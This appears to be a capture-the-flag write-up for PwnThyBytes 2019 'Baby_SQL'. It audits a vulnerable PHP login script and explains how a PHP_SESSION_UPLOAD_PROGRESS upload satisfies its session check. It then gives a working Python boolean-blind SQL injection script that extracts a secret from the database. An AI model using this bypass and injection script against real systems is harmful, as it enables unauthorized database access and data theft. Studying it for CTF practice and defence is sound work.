CTF Web Security

[PwnThyBytes 2019] Baby_SQL (session + SQL injection)

Posted on 2020-04-08, 2 min read

source.zip gives us the source code, so we start auditing.
In index.php every input is passed through addslashes() before the template is included, so the normal entry point is not injectable.
In login.php:

<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
function auth($user)
{
    $_SESSION['username'] = $user;
    return True;
}
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>

The only protection against direct access is a check that a session exists. login.php never calls session_start() itself, so when it is requested directly (bypassing index.php and its addslashes()) there is normally no $_SESSION and the script dies on the first line.
If we can get a session created some other way, the username reaches the query unescaped and is fully under our control. The password is wrapped in md5(), so it cannot be injected, but a trailing # comments that part of the query out.
From studying session deserialization we know the trick: PHP_SESSION_UPLOAD_PROGRESS. When session.upload_progress.enabled is on (the default), a multipart POST that uploads a file and carries a PHP_SESSION_UPLOAD_PROGRESS field makes PHP start the session itself to record the upload progress, keyed on the session id from the PHPSESSID cookie. As a result isset($_SESSION) is true even though the script never called session_start().
So we build a POST request with a file upload and a PHP_SESSION_UPLOAD_PROGRESS field, send a PHPSESSID cookie, and put the injection in the username GET parameter. The login only succeeds when the injected condition is true (the response then contains a <meta> refresh; otherwise 'Try again!'), which gives us a boolean-blind oracle:

import requests

# Direct access to templates/login.php skips the addslashes() loop in index.php.
url = 'http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'

# A multipart file upload plus a PHP_SESSION_UPLOAD_PROGRESS field (and a session
# cookie) makes PHP start the session itself, so isset($_SESSION) passes even
# though login.php never calls session_start().
files = {"file": "123"}
data = {"PHP_SESSION_UPLOAD_PROGRESS": "123"}
cookies = {"PHPSESSID": "123"}

# Boolean-blind injection: the success branch answers with a <meta> refresh,
# the failure branch with 'Try again!'.
flag = ''
for b in range(1, 50):
    for i in range(30, 130):
        params = {"username": 'test" or (ascii(substr((select group_concat(secret) from flag_tbl),' + str(b) + ',1))=' + str(i) + ')#',
                  "password": "test"}
        a = requests.post(url=url, files=files, data=data, cookies=cookies, params=params).text
        if 'meta' in a:
            flag += chr(i)
            print(flag)
            break
    else:
        break  # no character matched at this position: end of the secret
print(flag)
